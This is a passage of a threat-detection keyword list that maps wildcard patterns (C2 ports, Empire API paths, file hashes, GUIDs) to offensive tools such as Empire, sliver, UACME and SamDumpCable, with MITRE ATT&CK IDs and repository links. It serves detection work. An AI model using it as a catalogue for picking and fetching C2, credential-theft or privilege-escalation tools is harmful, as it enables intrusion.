Use -l 127.0.0.1 to override this warning*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*127.0.0.1:1080*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*127.0.0.1:1337*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*127.0.0.1:2222*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*127.0.0.1:31337*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*127.0.0.1:4567*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*127.0.0.1:53531*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*127.0.0.1:5555*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*127.0.0.1:8022*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*127.0.0.1:8848*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - 
T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*127.0.0.1:9050*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*1337*/api/agents/*/results?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*1337*/api/creds?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and 
Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*1337*/api/listeners?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - 
T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*1337*infernal-twin*,offensive_tool_keyword,infernal-twin,This tool is created to aid the penetration testers in assessing wireless security.,T1533 - T1553 - T1560 - T1569 - T1583,TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/entropy1337/infernal-twin,1,1,N/A,N/A,10,1193,273,2022-10-27T11:39:14Z,2015-02-07T21:04:57Z -*1337OMGsam*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*1337OMGsys*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation 
tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*1617117C-0E94-4E6A-922C-836D616EC1F5*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*192.168.0.110:1234*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*192.168.1.229 Passw0rd!*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*1a279f5df4103743b823ec2a6a08436fdf63fe30*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*1BACEDDC-CD87-41DC-948C-1C12F960BECB*,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*1c50adeb-53ac-41b9-9c34-7045cffbae45*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*1C5EDA8C-D27F-44A4-A156-6F863477194D*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*1E70D62D-CC36-480F-82BB-E9593A759AF9*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,0,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*1mil-AD-passwords.txt*,offensive_tool_keyword,icebreaker,Gets 
plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*1N3/Sn1per*,offensive_tool_keyword,Sn1per,Automated Pentest Recon Scanner.,T1083 - T1087 - T1518,TA0001 - TA0002 - TA0003,N/A,N/A,Information Gathering,https://github.com/1N3/Sn1per,1,0,N/A,N/A,10,6901,1737,2023-09-29T22:14:24Z,2015-09-06T15:47:38Z -*1N73LL1G3NC3x/Nightmangle*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,1,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*1password2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*2_lyncbrute.sh*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - 
TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*22A156EA-2623-45C7-8E50-E864D9FC44D3*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*23975ac9-f51c-443a-8318-db006fd83100*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,0,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*261f880e-4bee-428d-9f64-c29292002c19*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z 
-*273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*29446C11-A1A5-47F6-B418-0D699C6C3339*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z
-*2944dbfc-8a1e-4759-a8a2-e4568950601d*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z
-*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-*2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*2D863D7A-A369-419C-B4B3-54BDB88B5816*,offensive_tool_keyword,UsoDllLoader,This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ,T1210.001 - T1055 - T1574.001,TA0007 - TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/itm4n/UsoDllLoader,1,0,N/A,N/A,4,368,104,2020-06-06T11:05:12Z,2019-08-01T17:58:16Z -*2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2john.c,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 